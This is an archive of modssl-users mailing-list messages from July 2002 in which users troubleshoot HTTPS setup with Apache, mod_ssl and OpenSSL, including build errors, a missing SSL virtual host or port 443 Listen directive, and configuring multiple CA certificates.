From: Shalen [mailto:sammas_it@rediffmail.com]
Sent: Thursday, July 11, 2002 10:45 AM
To: modssl-users@modssl.org
Subject: HTTPS not running


  I am able to set up a http apache server using
  apache_1.3.26 and openssl-0.9.6d
   I also installed mod_ssl
   but when I write
   https://nessus
   I am not able to get anything
  but when I write
   http://nessus/
   I see the page,
Hey, it worked
    The SSL/TLS-aware Apache webserver was successfully
     installed
     I also ran                     
/usr/local/apache/bin/apachectl startssl
    But I am not able to run https server
     Can someone guide me
      I am in urgent need to set up https server

I am referring the page
http://www.modssl.org/docs/apachecon2001


Please suggest

_________________________________________________________
There is always a better job for you at Monsterindia.com.
Go now http://monsterindia.rediff.com/jobs

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 11 19:43:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA21386; Thu, 11 Jul 2002 19:42:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bistromath.cs.virginia.edu id TAA21352; Thu, 11 Jul 2002 19:41:19 +0200 (MET DST)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g6BHdTn6000294
	for ; Thu, 11 Jul 2002 13:39:29 -0400
Date: Thu, 11 Jul 2002 13:39:29 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: "'modssl-users@modssl.org'" 
Subject: Re: apache 2.0.39 + mod_ssl.so
In-Reply-To: <60644C5CF4F2D511A0120001025F99BC44BF25@imf00sa1.immo.dresdner.net>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, 11 Jul 2002, Sauer, Adrian wrote:

> ...this error occurs during start with "-DSSL":
> Cannot load /opt/apache_2.0.39/modules/mod_ssl.so into server:
> /opt/apache_2.0.39/modules/mod_ssl.so: undefined symbol: X509_free

This is a frequently asked question.  Please see (among other places):

http://nagoya.apache.org/bugzilla/show_bug.cgi?id=8034

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jul 11 21:21:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA26283; Thu, 11 Jul 2002 21:20:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from COHNTFS24.ci.henderson.nv.us id VAA26276; Thu, 11 Jul 2002 21:20:04 +0200 (MET DST)
Received: from gty.ci.henderson.nv.us (gwia.ci.henderson.nv.us) by COHNTFS24.ci.henderson.nv.us
 (Content Technologies SMTPRS 4.2.10) with SMTP id  for ;
 Thu, 11 Jul 2002 12:20:36 -0700
Received: from HENMAIL2-Message_Server by gty.ci.henderson.nv.us
	with Novell_GroupWise; Thu, 11 Jul 2002 12:19:55 -0700
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 5.5.6.1
Date: Thu, 11 Jul 2002 12:19:41 -0700
From: "Jeff Landers" 
To: 
Subject: RE: HTTPS not running
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id VAA26278
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jeff Landers" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is indicative of a variety of problems. What does the error log say? Probably a minor config error.

>>> srashmo@sandia.gov 07/11/02 10:18AM >>>
check the error log

-----Original Message-----
From: Shalen [mailto:sammas_it@rediffmail.com] 
Sent: Thursday, July 11, 2002 10:45 AM
To: modssl-users@modssl.org 
Subject: HTTPS not running


  I am able to set up a http apache server using
  apache_1.3.26 and openssl-0.9.6d
   I also installed mod_ssl
   but when I write
   https://nessus 
   I am not able to get anything
  but when I write
   http://nessus/ 
   I see the page,
Hey, it worked
    The SSL/TLS-aware Apache webserver was successfully
     installed
     I also ran                     
/usr/local/apache/bin/apachectl startssl
    But I am not able to run https server
     Can someone guide me
      I am in urgent need to set up https server

I am referring the page
http://www.modssl.org/docs/apachecon2001 


Please suggest

_________________________________________________________
There is always a better job for you at Monsterindia.com.
Go now http://monsterindia.rediff.com/jobs 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org 
User Support Mailing List                      modssl-users@modssl.org 
Automated List Manager                            majordomo@modssl.org 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org 
User Support Mailing List                      modssl-users@modssl.org 
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 12 15:06:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA29934; Fri, 12 Jul 2002 15:05:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA29898; Fri, 12 Jul 2002 15:04:51 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7A0C64CE61C; Fri, 12 Jul 2002 15:04:50 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 15624286BB; Fri, 12 Jul 2002 07:21:54 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mserve1.baker.edu id WAA00353; Thu, 11 Jul 2002 22:46:41 +0200 (MET DST)
Received: from mserve1.baker.edu (localhost.baker.edu [127.0.0.1])
	by mserve1.baker.edu (Mirapoint Messaging Server MOS 2.9.3.2)
	with SMTP id ADA11876 (AUTH psurat01);
	Thu, 11 Jul 2002 16:54:56 -0400 (EDT)
Message-Id: <200207112054.ADA11876@mserve1.baker.edu>
Received: from 158.80.16.120
	by mserve1.baker.edu (Mirapoint Messaging Server MOS 2.9.3.2)
	with HTTP/1.1;
	Thu, 11 Jul 2002 16:54:56 -0400
Date: Thu, 11 Jul 2002 16:54:56 -0400
From: Payal Suratwala 
Subject: mod_ssl issue, https is not working
To: modssl-users@modssl.org
X-Mailer: Mirapoint Webmail Direct 2.9.3.2
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Payal Suratwala 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have installed Apache-V2.39-compiled with mod_ssl module.  
I have installed OpenSSL-V-0.9.6c and php4.2.2 on my server.  
I have created the RSA certificate and Private key and moved 
them in to the path described in the ssl.conf file.  When I 
do ./apachectl startssl, the ssl starts but when I open 
netscape to go to the https://servername, it prompts me that 
I am about to go to the secure website,and I click okay and 
then it tells me that the website is not found.  my 
http://servername site works, but https://servername does 
not, so what do I need to do? Why does the https now working? 
I have looked every where to find information about this and 
nothing has worked for me so far so, I would really 
appriciate some help on this issue?  Thank You,

PayalSuratwala
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 12 15:06:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA29944; Fri, 12 Jul 2002 15:05:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA29897; Fri, 12 Jul 2002 15:04:51 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 96A7A4CE73D; Fri, 12 Jul 2002 15:04:50 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 319522873B; Fri, 12 Jul 2002 07:22:02 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ROSEMAIL01.rosettanet.org id BAA08264; Fri, 12 Jul 2002 01:36:15 +0200 (MET DST)
Received: by rosemail01 with Internet Mail Service (5.5.2653.19)
	id <3W5XWA9X>; Thu, 11 Jul 2002 16:40:02 -0700
Message-ID: <871F58D28DD49146B7740E5AE3317D4B2DAF2D@rosemail01>
From: ETTan 
To: "'modssl-users@modssl.org'" 
Subject: configure.bat
Date: Thu, 11 Jul 2002 16:40:00 -0700
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C22934.45E096E0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ETTan 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C22934.45E096E0
Content-Type: text/plain;
	charset="iso-8859-1"

I am stuck at the configure.bat.

C:\temp\mod_ssl-2.8.10-1.3.26>configure.bat --with-apache=../apache_1.3.26
--with-ssl=/openssl
Configuring mod_ssl/2.8.10 for Apache/1.3.26
 + Apache location: ..\apache_1.3.26 (Version 1.3.26)
 + OpenSSL location: \openssl
 + Applying packages to Apache source tree:
   o Extended API (EAPI)
Bad file descriptor at configure.bat line 210.

What's the problem here??


------_=_NextPart_001_01C22934.45E096E0
Content-Type: text/html;
	charset="iso-8859-1"






configure.bat




I am stuck at the configure.bat.




C:\temp\mod_ssl-2.8.10-1.3.26>configure.bat --with-apache=../apache_1.3.26 --with-ssl=/openssl

Configuring mod_ssl/2.8.10 for Apache/1.3.26

 + Apache location: ..\apache_1.3.26 (Version 1.3.26)

 + OpenSSL location: \openssl

 + Applying packages to Apache source tree:

   o Extended API (EAPI)

Bad file descriptor at configure.bat line 210.




What's the problem here??





------_=_NextPart_001_01C22934.45E096E0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 12 15:14:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA00682; Fri, 12 Jul 2002 15:13:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mm02snlnto.sandia.gov id PAA00643; Fri, 12 Jul 2002 15:12:40 +0200 (MET DST)
Received: from 132.175.109.4 by mm02snlnto.sandia.gov with ESMTP (
 Tumbleweed MMS SMTP Relay (MMS v4.7)); Fri, 12 Jul 2002 07:09:53 -0600
X-Server-Uuid: 95b8ca9b-fe4b-44f7-8977-a6cb2d3025ff
Received: from es08snlnt.sandia.gov (es08snlnt.sandia.gov
 [134.253.130.11]) by mailgate2.sandia.gov (8.12.3/8.12.3) with ESMTP id
 g6CDCb2B019467 for ; Fri, 12 Jul 2002 07:12:37
 -0600 (MDT)
Received: by es08snlnt.sandia.gov with Internet Mail Service (
 5.5.2653.19) id <3VF72WHZ>; Fri, 12 Jul 2002 07:12:36 -0600
Message-ID: 
From: "Ashmore, Samuel R" 
To: "'modssl-users@modssl.org'" 
Subject: RE: mod_ssl issue, https is not working
Date: Fri, 12 Jul 2002 07:12:35 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
X-Filter-Version: 1.8 (sass2426)
X-WSS-ID: 11300AAB3839868-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ashmore, Samuel R" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

 There are many reason such as a port is not setup right, theres a conflict
with other programs.  When you reply to this attach your error log.  If you
want to you can aso attach the httpd.conf or ssl.conf. This might help us
understand what is happening on your system.

-----Original Message-----
From: Payal Suratwala [mailto:payal.suratwala@baker.edu]
Sent: Thursday, July 11, 2002 2:55 PM
To: modssl-users@modssl.org
Subject: mod_ssl issue, https is not working


I have installed Apache-V2.39-compiled with mod_ssl module.  
I have installed OpenSSL-V-0.9.6c and php4.2.2 on my server.  
I have created the RSA certificate and Private key and moved 
them in to the path described in the ssl.conf file.  When I 
do ./apachectl startssl, the ssl starts but when I open 
netscape to go to the https://servername, it prompts me that 
I am about to go to the secure website,and I click okay and 
then it tells me that the website is not found.  my 
http://servername site works, but https://servername does 
not, so what do I need to do? Why does the https now working? 
I have looked every where to find information about this and 
nothing has worked for me so far so, I would really 
appriciate some help on this issue?  Thank You,

PayalSuratwala
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 12 15:24:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA01278; Fri, 12 Jul 2002 15:23:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA01262; Fri, 12 Jul 2002 15:23:02 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9E3784CE745; Fri, 12 Jul 2002 15:23:01 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id CAEAE285DC; Fri, 12 Jul 2002 15:19:02 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.yfp.com.tw id IAA10705; Fri, 12 Jul 2002 08:05:57 +0200 (MET DST)
Received: by email.yfp.com.tw with Internet Mail Service (5.5.2653.19)
	id <3R4Q4RVP>; Fri, 12 Jul 2002 14:06:15 +0800
Message-ID: 
From: =?big5?B?tsCk5b3l?= 
To: modssl-users@modssl.org
Subject: Could I add more than one CA to http.conf.
Date: Fri, 12 Jul 2002 14:06:06 +0800
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="big5"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id IAA10717
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?big5?B?tsCk5b3l?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Dear Sir:

	If we want to allow the users that have the
certificate is signed by two CA(For examble Verisign 
and Hitrust). How could I do?

	If I execute the SSLCACertificateFile command
tow times. The Second command is work, but the
first CS is disable.

	OS : Windows 2000.
	WEB Server: Apache 1.3, mod_ssl 2.6.1, OpenSSL  0.8.5

Is there any command to solve the problem?

Thanks

Bruce Huang (¶À¤å½å)

FoongTone §»³q¼Æ½X¬ì§Þ

¥x¥_¿¤¤¤©M¥«¤¤¥¿¸ô866¸¹14¼Ó

Tel: 886-2-22228861  ext 636
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 12 15:24:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA01292; Fri, 12 Jul 2002 15:23:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA01263; Fri, 12 Jul 2002 15:23:02 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B83164CE748; Fri, 12 Jul 2002 15:23:01 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 767EC28707; Fri, 12 Jul 2002 15:19:08 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.yfp.com.tw id IAA12186; Fri, 12 Jul 2002 08:41:22 +0200 (MET DST)
Received: by email.yfp.com.tw with Internet Mail Service (5.5.2653.19)
	id <3R4Q4RZV>; Fri, 12 Jul 2002 14:41:46 +0800
Message-ID: 
From: =?big5?B?tsCk5b3l?= 
To: modssl-users@modssl.org
Subject: RE: Could I add more than one CA to http.conf.
Date: Fri, 12 Jul 2002 14:41:36 +0800
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="big5"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id IAA12208
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?big5?B?tsCk5b3l?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi Sir:

	I have got the solution. Thanks.
Bruce Huang

>  -----Original Message-----
> From: 	¶À¤å½å  
> Sent:	Friday, July 12, 2002 2:06 PM
> To:	'modssl-users@modssl.org'
> Subject:	Could I add more than one CA to http.conf.
> 
> Dear Sir:
> 
> 	If we want to allow the users that have the
> certificate is signed by two CA(For examble Verisign 
> and Hitrust). How could I do?
> 
> 	If I execute the SSLCACertificateFile command
> tow times. The Second command is work, but the
> first CS is disable.
> 
> 	OS : Windows 2000.
> 	WEB Server: Apache 1.3, mod_ssl 2.6.1, OpenSSL  0.8.5
> 
> Is there any command to solve the problem?
> 
> Thanks
> 
> Bruce Huang (¶À¤å½å)
> 
> FoongTone §»³q¼Æ½X¬ì§Þ
> 
> ¥x¥_¿¤¤¤©M¥«¤¤¥¿¸ô866¸¹14¼Ó
> 
> Tel: 886-2-22228861  ext 636
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 12 15:57:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA03035; Fri, 12 Jul 2002 15:56:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from webmail26.rediffmail.com id PAA02987; Fri, 12 Jul 2002 15:55:06 +0200 (MET DST)
Received: (qmail 5946 invoked by uid 510); 12 Jul 2002 13:53:25 -0000
Date: 12 Jul 2002 13:53:25 -0000
Message-ID: <20020712135325.5945.qmail@webmail26.rediffmail.com>
Received: from unknown (138.231.176.8) by rediffmail.com via HTTP; 12 Jul 2002 13:53:25 -0000
MIME-Version: 1.0
From: "Shalen" 
To: "'modssl-users@modssl.org'" 
Cc: "Ashmore,Samuel R" 
Subject: Re: RE: mod_ssl issue, https is not working
Content-type: text/plain;
	format=flowed
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Shalen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Exactly
I am also facing a similar problem like this
I had posted my email last night but I am wondering why
my email is not there
I have installed apache_1.3.26
openssl 0.9.6d and
also modssl
My http server working but not https

Please suggest something as I am in a great need to set up a https 
sever for some testing

On Fri, 12 Jul 2002 Ashmore, Samuel R wrote :
>  There are many reason such as a port is not setup right, theres 
>a conflict
>with other programs.  When you reply to this attach your error 
>log.  If you
>want to you can aso attach the httpd.conf or ssl.conf. This might 
>help us
>understand what is happening on your system.
>
>-----Original Message-----
> From: Payal Suratwala [mailto:payal.suratwala@baker.edu]
>Sent: Thursday, July 11, 2002 2:55 PM
>To: modssl-users@modssl.org
>Subject: mod_ssl issue, https is not working
>
>
>I have installed Apache-V2.39-compiled with mod_ssl module.
>I have installed OpenSSL-V-0.9.6c and php4.2.2 on my server.
>I have created the RSA certificate and Private key and moved
>them in to the path described in the ssl.conf file.  When I
>do ./apachectl startssl, the ssl starts but when I open
>netscape to go to the https://servername, it prompts me that
>I am about to go to the secure website,and I click okay and
>then it tells me that the website is not found.  my
>http://servername site works, but https://servername does
>not, so what do I need to do? Why does the https now working?
>I have looked every where to find information about this and
>nothing has worked for me so far so, I would really
>appriciate some help on this issue?  Thank You,
>
>PayalSuratwala
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   
>www.modssl.org
>User Support Mailing List                      
>modssl-users@modssl.org
>Automated List Manager                            
>majordomo@modssl.org
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   
>www.modssl.org
>User Support Mailing List                      
>modssl-users@modssl.org
>Automated List Manager                            
>majordomo@modssl.org

_________________________________________________________
There is always a better job for you at Monsterindia.com.
Go now http://monsterindia.rediff.com/jobs

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 12 16:31:18 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA04746; Fri, 12 Jul 2002 16:30:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.espgroup.net id QAA04698; Fri, 12 Jul 2002 16:29:38 +0200 (MET DST)
Received: from no.name.available by mail.espgroup.net
          via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 12 Jul 2002 14:28:11 UT
Received: (private information removed)
Received: from [63.66.134.226] by brickwall.espgroup.net
          via smtpd (for [10.3.1.2]) with SMTP; 12 Jul 2002 14:28:04 UT
Message-ID: <3D2EE8BB.5070308@espgroup.net>
Date: Fri, 12 Jul 2002 10:33:31 -0400
From: "Dwayne Miller" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl issue, https is not working
References: <20020712135325.5945.qmail@webmail26.rediffmail.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dwayne Miller" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Can you post your config file?

Shalen wrote:

> Exactly
> I am also facing a similar problem like this
> I had posted my email last night but I am wondering why
> my email is not there
> I have installed apache_1.3.26
> openssl 0.9.6d and
> also modssl
> My http server working but not https
>
> Please suggest something as I am in a great need to set up a https 
> sever for some testing
>
> On Fri, 12 Jul 2002 Ashmore, Samuel R wrote :
>
>>  There are many reason such as a port is not setup right, theres a 
>> conflict
>> with other programs.  When you reply to this attach your error log.  
>> If you
>> want to you can aso attach the httpd.conf or ssl.conf. This might 
>> help us
>> understand what is happening on your system.
>>
>> -----Original Message-----
>> From: Payal Suratwala [mailto:payal.suratwala@baker.edu]
>> Sent: Thursday, July 11, 2002 2:55 PM
>> To: modssl-users@modssl.org
>> Subject: mod_ssl issue, https is not working
>>
>>
>> I have installed Apache-V2.39-compiled with mod_ssl module.
>> I have installed OpenSSL-V-0.9.6c and php4.2.2 on my server.
>> I have created the RSA certificate and Private key and moved
>> them in to the path described in the ssl.conf file.  When I
>> do ./apachectl startssl, the ssl starts but when I open
>> netscape to go to the https://servername, it prompts me that
>> I am about to go to the secure website,and I click okay and
>> then it tells me that the website is not found.  my
>> http://servername site works, but https://servername does
>> not, so what do I need to do? Why does the https now working?
>> I have looked every where to find information about this and
>> nothing has worked for me so far so, I would really
>> appriciate some help on this issue?  Thank You,
>>
>> PayalSuratwala
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>
>
> _________________________________________________________
> There is always a better job for you at Monsterindia.com.
> Go now http://monsterindia.rediff.com/jobs
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 12 16:32:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA04771; Fri, 12 Jul 2002 16:31:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ns0a.swx.com id QAA04741; Fri, 12 Jul 2002 16:30:18 +0200 (MET DST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.9.3+Sun/8.9.3) with ESMTP id QAA20956
	for ; Fri, 12 Jul 2002 16:30:07 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.9.3+Sun/8.9.3) with ESMTP id QAA12372
	for ; Fri, 12 Jul 2002 16:30:07 +0200 (MEST)
X-Authentication-Warning: gate0b.unix.swx.ch: iscan owned process doing -bs
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Subject: RE: mod_ssl issue, https is not working
Date: Fri, 12 Jul 2002 16:30:06 +0200
Message-ID: <14D1193E30E0894D8A773957C0AEE24AAA91C3@SOMEXEVS001.ex.ordersx.org>
Thread-Topic: mod_ssl issue, https is not working
Thread-Index: AcIppSZGurWdwi+pREyTN6oJ2by8eQACzsYg
From: "Boyle Owen" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id QAA04764
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Have you created an SSL virtualhost?

As well as installing mod_ssl, you laso have to define a virtual host to make use of it. Also, you have to tell the server to listen to port 443, e.g.

Listen 192.168.0.1:443

  ...etc

Rgds,

owen Boyle

>-----Original Message-----
>From: Payal Suratwala [mailto:payal.suratwala@baker.edu]
>Sent: Donnerstag, 11. Juli 2002 22:55
>To: modssl-users@modssl.org
>Subject: mod_ssl issue, https is not working
>
>
>I have installed Apache-V2.39-compiled with mod_ssl module.  
>I have installed OpenSSL-V-0.9.6c and php4.2.2 on my server.  
>I have created the RSA certificate and Private key and moved 
>them in to the path described in the ssl.conf file.  When I 
>do ./apachectl startssl, the ssl starts but when I open 
>netscape to go to the https://servername, it prompts me that 
>I am about to go to the secure website,and I click okay and 
>then it tells me that the website is not found.  my 
>http://servername site works, but https://servername does 
>not, so what do I need to do? Why does the https now working? 
>I have looked every where to find information about this and 
>nothing has worked for me so far so, I would really 
>appriciate some help on this issue?  Thank You,
>
>PayalSuratwala
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 12 16:37:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA05109; Fri, 12 Jul 2002 16:36:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mm02snlnto.sandia.gov id QAA05089; Fri, 12 Jul 2002 16:35:58 +0200 (MET DST)
Received: from 132.175.109.4 by mm02snlnto.sandia.gov with ESMTP (
 Tumbleweed MMS SMTP Relay (MMS v4.7)); Fri, 12 Jul 2002 08:33:11 -0600
X-Server-Uuid: 95b8ca9b-fe4b-44f7-8977-a6cb2d3025ff
Received: from ES01SNLNT.sandia.gov (es01snlnt.sandia.gov
 [134.253.130.4]) by mailgate2.sandia.gov (8.12.3/8.12.3) with ESMTP id
 g6CEZt2B023138 for ; Fri, 12 Jul 2002 08:35:55
 -0600 (MDT)
Received: by ES01SNLNT.sandia.gov with Internet Mail Service (
 5.5.2653.19) id ; Fri, 12 Jul 2002 08:35:55 -0600
Message-ID: 
From: "Ashmore, Samuel R" 
To: "'modssl-users@modssl.org'" 
Subject: RE: mod_ssl issue, https is not working
Date: Fri, 12 Jul 2002 08:35:51 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
X-Filter-Version: 1.8 (sass2426)
X-WSS-ID: 1130372D3877446-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ashmore, Samuel R" 
